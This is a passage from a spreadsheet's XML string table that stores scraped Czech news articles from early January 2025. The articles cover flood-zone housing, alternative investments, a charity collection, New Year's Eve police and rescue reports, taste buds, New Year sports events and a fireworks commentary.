  </si>
  <si>
    <t>20250101_59_3697387571_4d41cafc97300d83efbb.html</t>
  </si>
  <si>
    <t>4d41cafc97300d83efbb</t>
  </si>
  <si>
    <t>Jak je to s pojištěním nového domu v záplavové oblasti? Odborník popsal, na co si dát pozor</t>
  </si>
  <si>
    <t>Jak je to s pojištěním nového domu v záplavové oblasti? Odborník popsal, na co si dát pozor Podle odborníků je výstavba domů v záplavových oblastech možná, je ovšem třeba dbát na specifická pravidla. „V případě, že budu chtít stavět, je důležité si zajít na povodí nebo vodoprávní úřad a zjistit, zda se v daném území nebude měnit povodňový plán,“ doporučil Robert Špalek, předseda České komory autorizovaných inženýrů a techniků ( ČKAIT ). Obecně platí, že v záplavových oblastech je lepší raději vůbec nestavět. ČTĚTE DÁLE: Rudnete po alkoholu ? Může to signalizovat vážné zdravotní problémy, včetně cirhózy Vstříc svým obyvatelům se snažilo vyjít třeba zastupitelstvo Mikulovic na Jesenicku, kde zářijové povodně zničily desítky nemovitostí. Lidem, kteří během povodní přišli o své domy, zastupitelstvo nabídlo možnost zakoupit pozemek mimo záplavovou oblast v katastru obce za zvýhodněnou cenu. „Pokud zájemce splní všechny podmínky výstavby, dostane čtyřicetiprocentní slevu,“ uvedl starosta Roman Šťastný (STAN). Podzim přežil v karavanu Stanislav Gavlas, majitel jednoho ze zasažených pozemků v Mikulovicích , zakoupil v lednu pozemek v těsné blízkosti koryta řeky Bělé. Plánoval zde vybudovat malý pasivní dům. „Rozhodně bych nechtěl postavit dům, který by byl nepojistitelný. Ani by to nešlo, protože si na to chci vzít hypotéku,“ přiblížil pro CNN Prima NEWS. Zářijová povodeň zcela zničila nedaleký most a s sebou odnesla i část břehu, včetně rohu pozemku, kde měl dům stát. „Měl začínat dva metry od sousedky a dva metry od cesty,“ popsal Gavlas. Zničení cesty kolem pozemku znamenalo, že k sousedům a dalším nemovitostem je nutné dostávat se přes jeho pozemek. Majitel souhlasil s tím, že obci povolí dočasnou cestu přes svůj pozemek. Výměnou za to si zajistil, že obec v budoucnu navýší zeminou část jeho pozemku, což by mělo snížit riziko zaplavení. V rámci stavebních příprav dokonce zakoupil i karavan. „Patřil cirkusu Berousek. Koupil jsem ho někdy v dubnu, abych mohl na pozemku stavět a mít to jako stavební maringotku,“ popsal Gavlas, který nakonec v karavanu neplánovaně strávil celý podzim. MOHLO BY VÁS ZAJÍMAT: Výbuch domu ve Znojmě si vyžádal jednu oběť. Zraněním podlehl v nemocnici jeden z nájemníků</t>
  </si>
  <si>
    <t>20250101_6_3698459651_f704b037e1585209eb56.html</t>
  </si>
  <si>
    <t>f704b037e1585209eb56</t>
  </si>
  <si>
    <t>Investování do nezvyklých aktív může přinést neočekávaný zisk</t>
  </si>
  <si>
    <t>Investování do nezvyklých aktív může přinést neočekávaný zisk Zanechat komentář na Investování do nezvyklých aktív může přinést neočekávaný zisk Finance Investování je tradičně spojováno s akciemi, dluhopisy nebo nemovitostmi, avšak existují i alternativní cesty, které mohou přinést atraktivní výnosy. V posledních letech se začíná objevovat trend, kdy investoři obracejí svou pozornost k nezvyklým komoditám a aktivům, jako jsou umění, vína , starožitnosti nebo dokonce dinosaurí fosilie. Tyto netradiční investice nejen inspirují k diskusi o hodnotě, ale také podněcují otázku, co všechno může být považováno za investici. Která aktivita může vzbudit váš zájem? Jednou z nejzajímavějších oblastí alternativního investování je trh s uměním. V posledních letech došlo k obrovskému vzestupu online platforem, které umožňují běžným lidem investovat do děl známých umělců, aniž by museli mít miliony na vlastnictví celého obrazu. Například platformy jako Masterworks umožňují investorům nakupovat podíly v drahých uměleckých dílech, což z nich činí dostupnější formu investice pro širokou veřejnost. Unikátní na tomto přístupu je, že hodnota umění může dramaticky růst s časem, přičemž některá díla se na aukcích prodávají za desetkrát vyšší cenu, než za jakou byla zakoupena. Dalším fascinujícím segmentem jsou raritní whisky a vína . S rostoucím zájmem o investice do kvalitních nápojů se vytvořil trh, na kterém je možné nakupovat a prodávat lahve, které citelně zhodnocují svou hodnotu v průběhu let. Například lahve whisky, které byly vyrobeny před 30 lety, mohou dnes dosahovat astronomických cen. Tímto způsobem se nejenže zachovává hodnota, ale také se vytváří prostor pro sběratele, kteří chtějí vlastnit něco cenného a jedinečného. Fosilie jako investice: překvapivé možnosti Možná vás překvapí, že investice do dinosaurích fosilií nabízejí nejen možnosti pro rostoucí zisk, ale také fascinující příběhy a historii. Vysoce kvalitní exempláře, jako jsou kompletně zachovalá kostra Triceratopse nebo Tyrannosaura, se na aukcích prodávají za miliony dolarů. Čím déle se fosilie uchovávají a čím vzácnější jsou, tím vyšší je jejich tržní cena. Tento trh však není pro každého – vyžaduje značné znalosti, odborné posudky a správné kontakty v oboru. Zajímavou skutečností je, že fosilie, které jsou prodány na aukcích, často přitahují nejen paleontology, ale i investory hledající zajímavé a netradiční způsoby, jak diverzifikovat svou investiční strategii. Takový způsob investování je pro mnohé atraktivní nejen pro potenciál výnosů, ale také pro emocionální hodnotu, kterou korunuje vlastnictví tak raritních a historických předmětů. Jak začít investovat do netradičních aktiv? Pokud byste se rozhodli rozšířit své portfólio o netradiční aktiva, je dobré začít s menšími částkami a důkladně prozkoumat vybrané oblasti. Online platformy zaměřené na kolektivní investice do umění nebo vína mohou být ideálním řešením pro nováčky. Důležité je také sledovat trhy a vyhledávat odborníky, kteří vám pomohou porozumět trhu a aktuálním trendům. Investice do sbírkových předmětů nebo raritních vín mohou vyžadovat čas a trpělivost, ale s dobře nastavenou strategií se v budoucnu mohou stát skvělým způsobem, jak ochránit hodnotu majetku a získat finanční úspěch. V kombinaci s tradičními investicemi mohou netradiční aktiva diverzifikovat vaše portfólio a přinést nečekané zisky. Tento trend ukazuje, že svět investic je mnohem širší, než se na první pohled může zdát. Jak se technologie vyvíjejí a trhy se mění, mohou se objevovat nové příležitosti, které dosud byly považovány za okrajové. Být otevřený novým možnostem může vést k zajímavým objevům a nečekaným výhodám. Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny * Komentář Uložit do prohlížeče jméno, e-mail a webovou stránku pro budoucí komentáře. Δ Autor: Katka Krupková Autor person Katka Krupková Rubrika transition_slide Finance</t>
  </si>
  <si>
    <t>20250101_60_3697386807_6c7ec1c897a5a8f438c7.html</t>
  </si>
  <si>
    <t>6c7ec1c897a5a8f438c7</t>
  </si>
  <si>
    <t>Při Tříkrálové sbírce v hradecké diecézi vyjdou do ulic tisíce koledníků</t>
  </si>
  <si>
    <t>Při Tříkrálové sbírce v hradecké diecézi vyjdou do ulic tisíce koledníků Téměř 5000 kolednických skupinek vyjde v následujících dnech do ulic měst a obcí na východě Čech , aby od lidí získaly příspěvky do pokladniček Tříkrálové sbírky. Sbírka potrvá do 14. ledna. Při posledním ročníku Tříkrálové sbírky loni v královéhradecké diecézi, která zahrnuje Královéhradecký, Pardubický a části sousedních krajů, lidé darovali rekordních 27,8 milionu korun. V Pardubicích sbírku zahájí v pondělí 6. ledna v 09:30 na Pernštýnském náměstí, kde královským trojicím požehná pomocný biskup Josef Kajnek . Městem také projedou tři královny na koních a nebude chybět hudební vystoupení. V Hradci Králové dostanou koledníci požehnání na cestu od generálního vikáře Jana Paseky v úterý 7. ledna v 08:00 v katedrále svatého Ducha. Jako koledníci se do Tříkrálové sbírky zapojí školáci, skauti, farníci i rodiče s dětmi. Peníze budou vybírat do zapečetěných pokladniček. Přispět bude možné také prostřednictvím pevných kasiček v charitních zařízeních, kostelech, na úřadech či v obchodech, on-line na webu sbírky či pomocí dárcovské SMS. Koledování doprovodí řada akcí, například koncerty a průvody, živé betlémy a různé hry. Tradiční průvod tří králů s koňmi a živý betlém zahájí sbírku v Poličce a v Humpolci v sobotu 11. ledna. Průvod tří králů na koních projde také Českou Skalicí již v sobotu 4. ledna. Tříkrálové koncerty budou v Trutnově , Červeném Kostelci, Kutné Hoře, Ústí nad Orlicí , České Třebové , Horní Čermné nebo v Dobrušce . "V Litomyšli vyrobili k 25. výročí sbírky speciální tříkrálové pivo a koledníci vyrazí do ulic s ručně odekorovanými taškami. Kino pro koledníky za odměnu chystají v Hradci Králové , Jičíně , Trutnově , Chrudimi či Litomyšli , v Kutné Hoře bude i tříkrálový guláš," uvedla Jana Karasová z Diecézní charity Hradec Králové .. Charita pro koledníky také připravila novou kolednickou písničku od hradeckého písničkáře Michala Horáka. Výtěžek sbírky půjde na pomoc nemocným, handicapovaným a dalším potřebným především v regionech, kde se sbírka koná. Například hradecká charita ze sbírky podpoří službu domácí hospicové péče a nedávno zahájenou výstavbu lůžkového hospice ve Stěžerách. Pardubická charita použije vykoledované peníze na stavbu Centra sociálních služeb v Holicích, kde bude mít zázemí odlehčovací služba a mobilní hospic. Tříkrálová sbírka je největší dobročinnou sbírkovou akcí v České republice . Poprvé ji uspořádali v roce 2000 v olomoucké arcidiecézi. O rok později se Tříkrálová sbírka rozšířila po celé zemi. Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20250101_61_3697413919_f09e3f54febc523ef9ea.html</t>
  </si>
  <si>
    <t>f09e3f54febc523ef9ea</t>
  </si>
  <si>
    <t>Divoký Silvestr a Nový rok. Mladík na náměstí v Brně napadl bývalou přítelkyni</t>
  </si>
  <si>
    <t>Divoký Silvestr a Nový rok. Mladík na náměstí v Brně napadl bývalou přítelkyni Žena z Břeclavska napadla svého známého a ukradla mu peněženku. Je podezřelá z trestného činu loupeže. „Starší muž skončil se zraněními v nemocnici, podezřelou dohledala a se souhlasem státního zástupce zadržela policejní hlídka," sdělil policejní mluvčí Pavel Šváb. Mladý muž na Moravském náměstí v Brně zase po půlnoci napadl svou expřítelkyni a s nožem v ruce vyhrožoval její kamarádce, která se jí snažila na zemi pomoci. Mladík skončil v moci policistů. „Je podezřelý z výtržnictví a nebezpečného vyhrožování," uvedl Šváb. Střet s autobusem Ještě před půlnocí nezvládl mladý student jízdu na jednokolce v brněnské ulici Radlas. Nedal přednost a střetl se s autobusem. „Vyvázl se zraněním," doplnil mluvčí policistů. Brněnští strážníci na Silvestra našli na břehu Svratky poblíž ulice U Zoologické zahrady třiadvacetiletého mladíka, který ani nezvládl dechovou zkoušku. „Kromě alkoholu si totiž vzal i léky na úzkost. Hlídka mu přivolala sanitku a zdravotníci si ho převzali do péče," podotkl mluvčí městské policie Jakub Ghanem. Spolupráci strážníků nejprve nežádali, ale když se muž začal cítit lépe, osádku ohrožoval. „Poskytli jsme jí proto doprovod až do nemocnice," zmínil Ghanem. Do Jírovy ulice volala na Silvestra hlídka strážníků sanitku k pětadvacetiletému muži, který ležel v podchodu a nadýchal přes 2,4 promile alkoholu . Autem najel na stezku Zouvalka O silvestrovskou kuriozitu se postaral řidič auta nedaleko hradu Veveří. Na dřevěnou stezku Zouvalka určenou výhradně pro pěší najel ve směru od Bystrce svojí škodovkou. Strážníci jej tam našli 31. prosince krátce po poledni na základě telefonického upozornění od náhodného svědka. Šestašedesátiletý muž jim vysvětloval, že zabloudil. „Vůz v blízkosti schodů jedním kolem zapadl, a kolegové proto požádali o příjezd hasiče. Měli podezření, že by motorista mohl být opilý, což potvrdila dechová zkouška provedená republikovými policisty. Nadýchal bezmála jedno promile," přiblížil Ghanem. Z výtržnictví a ublížení na zdraví se budou zodpovídat dva muži, kteří v Dubňanech napadli při oslavách několik lidí. Autor: Michal Hrabal Autor Michal Hrabal</t>
  </si>
  <si>
    <t>17130</t>
  </si>
  <si>
    <t>21360</t>
  </si>
  <si>
    <t>20250101_62_3697386856_8fae35f48dc37a269c05.html</t>
  </si>
  <si>
    <t>8fae35f48dc37a269c05</t>
  </si>
  <si>
    <t>Tajemství chuťových pohárků: Proč těžko odoláváme sladkému a jak to vlastně je se všemi chutěmi, vysvětluje nutriční poradce</t>
  </si>
  <si>
    <t>Tajemství chuťových pohárků: Proč těžko odoláváme sladkému a jak to vlastně je se všemi chutěmi, vysvětluje nutriční poradce Jak je možné, že naše chuťové pohárky nejsou nikdy znaveny a stále mají spoustu energie na to, co jim podáváme? Nejsou vlastně chuťové pohárky nepřítelem organismu, který se musí leckdy potýkat se zdravotními potížemi ze špatné životosprávy? Odpověď jsme hledali u nutričního poradce. Je to neustálý boj. Ráno po cestě do práce na nás útočí na každém druhém rohu neodolatelná vůně právě dopečených dobrot z pekárny, po obědě si prostě musíme dát alespoň malý kousek „něčeho sladkého“. A večer? To je přece doba na skvělou večeři a dobré pití po tak náročném dni. Zkrátka myšlenky na všechny lahůdky světa, jedno jestli sladké, slané, kyselé, ne a ne nás nechat klidnými. Jak to ale vlastně je se všemi chutěmi? Chuťový pohárek funguje zhruba deset dnů, poté zaniká a vzniká nový / Depositphotos.com Chuť patří mezi naše základní smysly. Někteří z nás chuti přikládají menší význam, dělí věci na ty, které jim jednoduše chutnají, a na ty ostatní. Někteří z nás si ale na schopnosti rozeznávat různé chuti zakládají a stávají se sommeliéry nebo gurmány. A například batolata poznávají okolní svět nejprve zejména podle chuti, což některé maminky dovádí k šílenství, protože taková hlína z květináče sice možná chutná zajímavě, ale není jistě obrazem dokonalé potraviny. Zkusili jste se někdy zamyslet, jak vlastně vše funguje? A proč nám některá jídla nebo potraviny chutnají více a třeba kolegovi z práce nesmí přijít ani pod nos? A hlavně, proč mnozí z nás milují sladké a tučné věci, i když víme, že nám kazí postavu a hmotnost? Mlsný jazýček Základními, takzvanými senzorickými orgány, jsou velmi složité orgány chuťové. " Ty se skládají ze čtyř druhů buněk, ústí do nich speciální nervy a do každého chuťového pohárku dále ústí okolo padesáti nervových vláken. Chuťový pohárek funguje zhruba deset dnů, poté zaniká a vzniká nový. Tento proces probíhá v celé ústní dutině a zejména na jazyku, takže se nám pohárky neustále obnovují. A tak můžeme vychutnávat jídla i nápoje stále dokola a budou nám chutnat stejně", vysvětluje Mgr. Pavel Suchánek. S obnovou pohárků souvisí i některé techniky příprav gurmánů nebo sommeliérů na různé ochutnávky a soutěže, kdy se před akcemi konzumují jen chuťově méně výrazná jídla, aby pohárky byly naplno připraveny na nové chutě. Pro představu, odhaduje se, že průměrný člověk má zhruba 10 000 chuťových pohárků. Jak se tvoří chuť Na jazyku jsou chuťové pohárky a každý rozeznává jednu ze čtyř základních chutí, i když je možné, že se některé oblasti vnímání chutí mohou lehce překrývat. Základními chutěmi jsou sladká, slaná, kyselá a hořká. Někteří odborníci pak tvrdí, že existuje i pátá chuť, tzv. umami, pro kterou je typická asijská kuchyně a jejímž reprezentantem je glutamát sodný. Chuti jsou seřazeny za sebou na jazyku od špičky až ke kořenu, často se můžeme také dočíst, že sladkou chuť vnímáme zejména na špičce jazyka, slanou v přední části jazyka, kyselou po stranách a hořkou vzadu. Není nic překvapivého, že kyselou chuť vyvolávají kyseliny a slanou chuť sodík, který je součástí kuchyňské soli. Zajímavá situace nastává u sladké chuti. Sladké jsou samozřejmě cukry jako řepný nebo mléčný, sladkou chuť mají i škroby, některé alkoholy a dokonce některé soli, například berilia, nebo sloučeniny kyseliny aspartové. Sladká jsou i náhradní sladidla, která často sladí daleko intenzivněji než cukr, který nahrazují. A nejsladší jsou paradoxně nikoliv speciální cukry, ale bílkoviny z afrických bobulí. Název sladkých bílkovin je thaumatin a monelin, které jsou 100 000x sladší než cukr. Sladká chuť je velmi složitý lidský smysl, u kterého je dokonce prokázáno, že byl důležitý i ve vývoji člověka. Existují totiž teorie, které vysvětlují současný nárůst nadváhy a obezity v průmyslově rozvinutých oblastech světa ne příliš originálním upozorněním na nadprůměrnou konzumaci cukrů a tuků. Ale proč právě tyto dvě složky potravy jsou pro nás tak neodolatelné? Především proto, že měly a mají svůj nezastupitelný význam. Sladká chuť signalizovala našim předkům, že je daná potravina zdrojem rychle využitelné energie, v případě bohatých to byly tučné pokrmy. Proto se u lidí, a pravděpodobně nejen u nich, vyvinula chuťová preference sladké chuti = rychle použitelný a využitelný zdroj energie např. při pochodech, práci či útěku před nebezpečím. Proto je sladká chuť na samotné špičce jazyka, abychom okamžitě zjistili, zda nám tato potravina dodá rychle energii. Cukry potřebujeme Cukry jsou tak opravdu velmi důležité pro náš organismus a stejně tak i sladká chuť. Tučné potraviny poskytovaly a poskytují množství energie, které si organismus může uložit do svých zásob na pozdější náročné období, např. zimní období hladu. Proto nám do dnešních dní zůstal sklon konzumovat věci sladké a tučné a nejlépe takové potraviny, které obsahují obojí – máslové dorty, smetanová zmrzlina, čokoláda, ale i hamburgery a bílé pečivo. „Asi málokdo dokáže zcela odbourat chuť na sladké a konzumaci sladkých potravin. Musel by vlastně potlačovat své přirozené chuťové preference. Přesto je ale možné a vhodné konzumovat cukry v rozumném množství. Stále totiž platí, že cukr je základním zdrojem energie pro fyzickou aktivitu, a to zejména pro její začátek, takže není určitě chyba dopřát si před sportem nebo prací na zahrádce sklenici sladkého syceného nápoje nebo kávu s cukrem. Cukry potřebujeme, avšak ne v množství, které by ohrožovalo náš organismus. Konzumujte tedy potraviny a nápoje obsahující cukr v rozumném množství tak, abyste netloustli a především se hýbejte,“ doporučuje Mgr. Pavel Suchánek. Je jisté, že chuťové pohárky nejsou nepřítelem organismu. Tím je lenost, nevyvážený životní styl a neukázněnost v jídle a pití. Každý jsme zodpovědný sám za sebe a je jen na nás, jestli si zvolíme cestu nicnedělání, nebo aktivní život, do kterého pak patří vše, co máme rádi, pokud je to tedy v rozumné míře. Není totiž špatné jídlo a pití, ale špatný životní styl. zdroj: článek vznikl ve spolupráci s MUDr. Pavlem Suchánkem z Institutu klinické a experimentální medicíny Praha ( IKEM )</t>
  </si>
  <si>
    <t>596</t>
  </si>
  <si>
    <t>1.07</t>
  </si>
  <si>
    <t>20250101_63_3697446562_7e77d47893d54c1910a5.html</t>
  </si>
  <si>
    <t>7e77d47893d54c1910a5</t>
  </si>
  <si>
    <t>Alkohol, rvačky, rachejtle. Oslavy konce roku odnesla na Vysočině i autobusová zastávka</t>
  </si>
  <si>
    <t>Alkohol , rvačky, rachejtle. Oslavy konce roku odnesla na Vysočině i autobusová zastávka Tři zraněné v souvislosti s použitím zábavní pyrotechniky museli o silvestrovské noci ošetřit záchranáři na Vysočině. Policisté vyšetřují například zdemolování autobusové zastávky u Lukova na Třebíčsku, kterou někdo poškodil při odpálení rachejtlí. „Během noční směny z 31. prosince na 1. ledna vyjeli naši záchranáři celkem k 62 případům a ošetřili 59 pacientů. Počet výjezdů byl obdobný jako v loňském roce,“ uvedl na facebooku mluvčí zdravotnické záchranné služby Petr Janáček. Přímo s oslavami příchodu Nového roku souviselo 23 případů. „Nejčastějšími důvody našich výjezdů byly úrazy, kterých bylo celkem jedenáct. Ve třech případech jsme zasahovali u pacientů po fyzickém napadení. K intoxikaci alkoholem jsme vyjeli šestkrát, přičemž všichni pacienti byli transportováni do zdravotnického zařízení k dalšímu ošetření,“ bilancoval ráno mluvčí. Poranění v obličeji Ani tentokrát nechybí ve výčtu zranění případy související s použitím pyrotechniky. „Tři pacienti byli zraněni, z toho jeden utrpěl poranění horní končetiny a dva poranění v obličeji. Tato zranění si vyžádala okamžitou zdravotnickou pomoc a transport do nemocnice,“ zmínil Petr Janáček. Policie na Vysočině řešila během posledního dne roku a první noci nového roku více než stovku nejrůznějších oznámení. Nejvážnější byl případ seniorky z Třebíčska, která se v úterý nevrátila do místa svého bydliště. „Do hledání se zapojili policisté včetně psovodů, a to nejen z Vysočiny, ale také z Jihomoravského kraje. Po seniorce pátrali rovněž hasiči jak dobrovolní, tak profesionální, dále členové Czech SAR Teamu a skupiny Resdogs ,“ uvedla mluvčí Jana Kroutilová . Hasiči nalezli seniorku v lese v členitém a těžko přístupném terénu, do péče si ji převzali zdravotníci. Poškození čekárny Zřejmě v předstihu a dost nepatřičným způsobem slavil konec roku zatím neznámý pachatel na Třebíčsku. Jeho řádění odnesla autobusová zastávka u obce Lukov. „Ke spáchání činu došlo v noci z pondělí na úterý. Policisté zjistili, že pachatel umístil v dřevěné zastávce autobusu pravděpodobně zábavní pyrotechniku, kterou následně odpálil. Došlo k poškození celé zastávky,“ popsala mluvčí. Podle hasičů byla silvestrovská noc na Vysočině relativně klidná, řešit museli například požáry krabic se zábavní pyrotechnikou v Náměšti nad Oslavou a Jihlavě nebo požár plastového kontejneru ve Žďáru nad Sázavou . „O půl třetí ráno jsme byli povoláni k dopravní nehodě osobního vozidla na komunikaci u obce Pořežín u Velké Losenice na Žďársku. Při nehodě se zranili dva lidé,“ zmínila mluvčí hasičů Petra Musilová. Nejvážnější byl zásah ve Stojčíně na Pelhřimovsku, kde hořely dva přístřešky na zahradě rodinného domu. Příčinou byla podle hasičů zřejmě nedbalost při ukládání popela, škoda je kolem 400 tisíc korun. Čekárna autobusové zastávky u Lukova na Třebíčsku po odpálení zábavní pyrotechniky Autor: Jiří Bárta Autor person Jiří Bárta</t>
  </si>
  <si>
    <t>20250101_64_3697351123_68b280e15e9e447a1d96.html</t>
  </si>
  <si>
    <t>68b280e15e9e447a1d96</t>
  </si>
  <si>
    <t>Záchranáři v noci přijali přes 160 volání na tísňovou linku Silvestrovská noc ve Zlínském kraji byla z pohledu záchranářů velmi podobná jako v předchozích letech. Zdravotnické posádky zasahovaly u více než stovky událostí a operátorky zdravotnického operačního střediska přijaly přes 160 volání na tísňovou linku 155. U řady výjezdů byl společným jmenovatelem alkohol . „ Dvě pacientky mladšího věku ho požily takové množství, že po nezbytném vyšetření a ošetření na místě je naše posádky převezly na dětskou jednotku intenzivní péče,“ informovali záchranáři na webu ZZS ZK. Záchranáři zasahovaly také u třech desítek úrazů a další pacienty ošetřili po napadení. „ K mnoha těmto úrazům by nedošlo, pokud by lidé nebyli pod vlivem alkoholu ,“ pokračovali záchranáři. Záchranáři řešili také jeden typický úraz spojený s použitím zábavné pyrotechniky. „Chlapce petarda poranila v obličeji,“ upřesnili záchranáři ZZS ZK. Foto: ZZS ZK</t>
  </si>
  <si>
    <t>20250101_65_3697608352_b8c26d59d454aecf79b4.html</t>
  </si>
  <si>
    <t>b8c26d59d454aecf79b4</t>
  </si>
  <si>
    <t>Hlavní zprávy</t>
  </si>
  <si>
    <t>Hlavní zprávy Reportér Ondřej Látal : Po celém Česku lidé vyrazili na novoroční túry a výšlapy. Přes tisíc lidí se třeba vydalo na vrchol Ještědu . Na tradiční výstup na vrch Bukovec se pak vypravili lidé na Vysočině. A cyklisté z Pardubicka tradičně vyjeli na Kunětickou horu . Naďa Kubínková, reportérka: Počasí je skoro ideální, říká mi přímo po dojezdu 77letý Jiří Klicpera ze svazu cyklistiky Pardubického kraje . A František Koče ho doplňuje: M8me rádi lepší teplotu, to je pravda, ale pustíme se do toho, musíme se obléknout. Spolu s manželkou Martinou vyjeli z Pardubic na Nový rok už po několikáté. Cesta na Kunětickou horu jim trvala asi půl hodiny. Manželka: Ujel, protože je rychlejší, je lepší než já. Naďa Kubínková, reportérka: Ale nezlobíte se na něj. Manželka: Vůbec, já už to na něm vidím, že šlápne do pedálů a je v prachu. Naďa Kubínková, reportérka: Nadšenci novoroční jízdy vstávali časně ráno, neodradilo je ani počasí, ani probdělá noc. To má totiž tu výhodu, že se zbavíte veškerých zbytků alkoholu v krvi a vrátíte se domů s čerstvou hlavou a naprosto v pořádku a v pohodě. Naďa Kubínková, reportérka: Novoroční jízda se konala už po 77. Z Kunětické Hory , Naďa Kubínková, radiožurnál.</t>
  </si>
  <si>
    <t>43200</t>
  </si>
  <si>
    <t>20250101_66_3697357325_690336265312edadd0de.html</t>
  </si>
  <si>
    <t>690336265312edadd0de</t>
  </si>
  <si>
    <t>Tomáš Kožák ovládl Novoroční běh na Svatošské skály. Vyhrál počtvrté v řadě</t>
  </si>
  <si>
    <t>Tomáš Kožák ovládl Novoroční běh na Svatošské skály. Vyhrál počtvrté v řadě Ženské kategorii podle předpokladů dominovala Lenka Kůsová z Triatletu Karlovy Vary , která opět potvrdila, že zraje jako víno a po zásluze brala první příčku v kategorii žen 39–45 let. Mezi významné účastníky dvaačtyřicátého ročníku, který společně pořádaly SK Liapor Karlovy Vary a Triatlet Karlovy Vary , patřili ministr pro místní rozvoj Petr Kulhánek v dresu LK Slovan Karlovy Vary a trenér brankářů HC Energie Karlovy Vary Lukáš Mensator , který hájil barvy Andělské Hory . V závodu se představili tradičně mladí talenti, kdy mezi chlapci do 16 let zvítězil Martin Lukáš z klubu Triatlet Karlovy Vary . Taktéž mezi ženami do 34 let obsadila první místo Eliška Kučerová z Triatletu Karlovy Vary . V dalších věkových kategoriích excelovali například Michal Oplt (muži 40–49 let) a Slávek Švejdar (muži 50–59 let), přičemž závodníci reprezentovali různé kluby z regionu i mimo něj. Klání se zúčastnili také zástupci veteránských kategorií jako Milan Kožák (muži 60–69 let) a Romana Lubinová (ženy nad 50 let). 42. ročník Novoroční běh na Svatošské skály. | Video: Daniel Seifert Chlapci do 16 let: 1. LUKÁŠ Martin 21:37.7 (Triatlet); 2. VÁŠA Theodor 23:19.1 (Triatlet Karlovy Vary ); 3. ŠMEHLÍK Timm 23:42.3 (Triatlet Karlovy Vary ); muži do 39 let: 1. KOŽÁK Tomáš 20:16.9 ( SC Start K. Vary); 2. BÖSE Adam 20:45.6 (Road 2 Kona); 3. DUŠEK Karel 21:44.1 (TITAN TRI LIFE ZLÍN); muži 40 – 49 let: 1. OPLT Michal 20:50.8 (OTC VLČÁCI); 2. NOVOTNÝ Lubomír 21:57.3 ( Cheb ); 3. KASAL Jan 22:08.4 (AK Sokolov); muži 50 – 59 let: 1. ŠVEJDAR Slávek 23:35.3 (Triatlet Karlovy Vary ); 2. JUNGMANN Petr 25:49.3 (TJ Slavia K.Vary); 3. KROPÁČEK Jan 25:54.9 (Wolfnet.cz); muži 60 – 69 let: 1. KOŽÁK Milan 24:16.2 ( SC Start Karlovy Vary ); 2. VRÁBEL Ivan 26:57.9 (Bike a běh Ostrov); 3. VLTAVSKÝ Marcel 27:47.8 (ACES KV); muži nad 70 let: 1. SZÁSZ Petr 34:01.2 ( Sokolov ); 2. WESTRMAIER Jiří 35:21.4 (Kolová); 3. ROUČA Karel 35:23.0 (Cyklodrom K.Vary); děvčata do 16 let: 1. BÖSE Patricie 26:37.1 (Road 2 Kona); 2. HUDÁKOVÁ Anna 27:48.6 ( SC Start Karlovy Vary ); 3. DIBELKOVÁ Isabell 32:49.8 (Atletika Ostrov); ženy do 34 let: 1. KUČEROVÁ Eliška 26:13.0 (Triatlet Karlovy Vary ); 2. HYKŠOVÁ Barbora 26:50.8 (USK Akademik Cheb); 3. JUNGMANNOVÁ Kateřina 27:41.7 (Triatlet K.Vary); ženy 35 – 49 let: 1. KŮSOVÁ Lenka 25:15.5 (Triatlet Karlovy Vary ); 2. DUBCOVÁ Jana 26:23.1 (TITAN TRI LIFE); 3. OPLTOVÁ Martina 27:21.5 ( Horní Slavkov ); ženy nad 50 let: 1. LUBINOVÁ Romana 27:12.6 (SC Start K.Vary); 2. NEHYBOVÁ Ilona 31:49.9 ( Chodov ); 3. VYŠÍNOVÁ Iveta 32:56.0 ( Karlovy Vary ). Kompletní výsledky na sokotime.cz Autor: Daniel Seifert Autor Daniel Seifert</t>
  </si>
  <si>
    <t>20250101_67_3715754720_dd507f9be165260d751c.html</t>
  </si>
  <si>
    <t>dd507f9be165260d751c</t>
  </si>
  <si>
    <t>Mrtvé labutě, vyděšení psi i koně vs. „Pomsta za psí výkaly“. Snad se konečně dočkáme omezení ohňostrojů</t>
  </si>
  <si>
    <t>Mrtvé labutě, vyděšení psi i koně vs. „Pomsta za psí výkaly“. Snad se konečně dočkáme omezení ohňostrojů 4. 1. 2025 Jan Lodl Zdroj: Forum24 URL zdroje: www.forum24.cz O koních jinde Počet fotografií: 1 KOMENTÁŘ / Jako každý rok se během silvestrovské noci proměnila česká města a vesnice v bitevní pole. Vřava a hluk mnohdy nebyly daleko od dělostřelecké palby. Navíc salvy se průběžně ozývají mnohde od začátku prosince a trvají i do půlky ledna. Znamená to obrovský stres pro domácí i volně žijící zvířata, ale i velké znečištění ovzduší a mnoho zraněných. Ty navíc hlásí i okolní země, kvůli doposud velmi liberálním pravidlům prodeje „zábavní“ pyrotechniky v Česku. Tak si nalijme čistého vína , české tradice nejsou to, co si pamatujete z osmdesátých let. A masové individuální odpalování dělbuchů či raket pochází právě z té doby. V řadě zemí je to výrazně omezeno, Česko se snad letos přidá. Ohňostroje k oslavám příchodu nového roku jistě již nějakou dobu patří. Ovšem pozor, oficiální ohňostroje, jaké donedávna pořádalo mnoho velkých měst. To je možná tradice trvající nižší jednotky desetiletí. V Česku se ale, zejména v posledních letech, stalo zvykem proměnit skoro každou ulici v bitevní pole. Celý článek přináší Forum24: Mrtvé labutě, vyděšení psi i koně vs. „Pomsta za psí výkaly“. Snad se konečně dočkáme omezení ohňostrojů Před 13 hodinami Roman Cichocki Vysoká návštěvnost a dobré podmínky pro zimní sporty přispěly během uplynulých zimních prázdnin k náročným zásahům, které kladly důraz na znalost… Při náročném zásahu u Přebuzi zachránila horská služba život jezdkyni na koni Předevčírem Autor: Autor snímku:</t>
  </si>
  <si>
    <t>20250101_68_3697325094_f4274f776d64365c59f1.html</t>
  </si>
  <si>
    <t>f4274f776d64365c59f1</t>
  </si>
  <si>
